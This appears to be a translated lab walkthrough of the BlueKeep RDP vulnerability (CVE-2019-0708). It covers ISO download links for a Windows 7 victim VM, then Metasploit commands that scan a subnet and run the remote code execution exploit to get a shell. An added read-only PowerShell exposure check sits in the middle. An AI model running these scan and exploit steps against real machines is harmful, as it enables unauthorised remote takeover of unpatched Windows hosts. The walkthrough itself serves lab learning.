Vulnerability Introduction
On May 14, 2019, Microsoft released a security patch fixing a remote code execution vulnerability in Windows Remote Desktop Services that affects some older versions of Windows. The vulnerability is pre-authentication and requires no user interaction, which means it can be exploited by a network worm. Any malware exploiting this vulnerability can spread from infected computers to other vulnerable computers in much the same way the WannaCry malware spread in 2017.
As soon as Microsoft's official news came out, major security vendors began to issue vulnerability warnings. During that time, I was looking for a corresponding PoC, but what I found was either a PoC that could not be used, or a PoC written for previous vulnerabilities, or, even worse, one where clicking attack gave you a surprise.
Lab Environment
For the vulnerable environment, I used a system with Windows 7 SP1 installed in a virtual machine at that time.
001 Install Windows 7 SP1 in a VM to simulate the victim machine
Windows 7 SP1 download links (the target machine here uses the Win7 SP1 system provided by cousin Qingshui):
Thunder download: ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
Cloud disk download (Windows 7 x64): https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg
Extraction code: fiwx
002 msf configuration
Download cve_2019_0708_bluekeep_rce.rb into msf's module directory /usr/share/metasploit-framework/modules/exploits/windows/rdp
Scan for vulnerable hosts
msfconsole
# Search for the available modules
search 0708
# Load the scan module
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
# Set the address range to scan
set RHOSTS 192.168.1.1/24
run
As shown in the figure, the scan finds one device on the current network segment, 192.168.1.8, that has this vulnerability.
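A scanner hit can be confirmed from the flagged host itself. The PowerShell function below is an added example, not part of the original post: it reads the OS build, the RDP and NLA registry settings and the active TCP listeners without changing anything. The function name Get-RdpExposure and its parameters are hypothetical; the default build string is the one in the module's target list on this page, and KB IDs have to be supplied from Microsoft's advisory.

```powershell
# Added example (not from the original post). Read-only: nothing is modified.
# Get-RdpExposure and its parameters are hypothetical names used for illustration.
function Get-RdpExposure {
    param(
        [string]$AffectedBuild = '6.1.7601',  # build string from the target list on this page
        [string[]]$PatchKb = @()              # KB IDs from the vendor advisory; none hard-coded
    )
    $ts  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $tcp = "$ts\WinStations\RDP-Tcp"
    $pol = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'

    # Return a registry value, or $null when the key or the value is absent.
    function Read-Value([string]$Path, [string]$Name) {
        $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
        if ($item) { $item.$Name } else { $null }
    }
    # A value set by Group Policy takes precedence over the local setting.
    function Read-Effective([string]$Local, [string]$Name) {
        $fromPolicy = Read-Value $pol $Name
        if ($null -ne $fromPolicy) { $fromPolicy } else { Read-Value $Local $Name }
    }

    # Get-WmiObject is used so the check also runs on the PowerShell 2.0 shipped with Windows 7.
    $version = (Get-WmiObject -Class Win32_OperatingSystem).Version
    $deny    = Read-Effective $ts  'fDenyTSConnections'   # 0 = RDP connections allowed
    $nla     = Read-Effective $tcp 'UserAuthentication'   # 1 = NLA required
    $port    = Read-Value $tcp 'PortNumber'
    if ($null -eq $port) { $port = 3389 }                 # RDP default port

    # Is anything actually listening on the configured RDP port?
    $ipProps   = [System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties()
    $listening = [bool]($ipProps.GetActiveTcpListeners() | Where-Object { $_.Port -eq $port })

    # Get-HotFix only matches exact KB IDs; a later rollup that contains the fix is not recognised.
    $kbFound = @(Get-HotFix | Where-Object { $PatchKb -contains $_.HotFixID } |
                 ForEach-Object { $_.HotFixID })

    $affected = $version -eq $AffectedBuild
    $rdpOn    = ($deny -eq 0) -and $listening
    New-Object PSObject -Property @{
        OsVersion      = $version
        AffectedBuild  = $affected
        RdpEnabled     = $rdpOn
        RdpPort        = $port
        NlaRequired    = ($nla -eq 1)
        PatchKbFound   = $kbFound
        # Affected build, listening RDP, no NLA and no listed KB: reachable before authentication.
        PreAuthExposed = $affected -and $rdpOn -and ($nla -ne 1) -and ($kbFound.Count -eq 0)
    }
}
Get-RdpExposure | Format-List
```

With no KB IDs passed, the patch check finds nothing and the result errs on the side of reporting exposure. NLA only removes the pre-authentication path; it does not replace the patch.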
Vulnerability Exploit
Attack with msf
When attacking with msf, pay attention to configuring the two parameters RHOSTS and target.
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 192.168.1.8
# The current target machine is a virtual machine with Win7 installed
set target 2
run
A shell is obtained successfully.
Values of the target parameter (Exploit target):
Id  Name
--  ----
1   Windows 7 SP1/2008 R2 (6.1.7601 x64)
2   Windows 7 SP1/2008 R2 (6.1.7601 x64 - Virtualbox)
3   Windows 7 SP1/2008 R2 (6.1.7601 x64 - VMWare)
4   Windows 7 SP1/2008 R2 (6.1.7601 x64 - Hyper-V)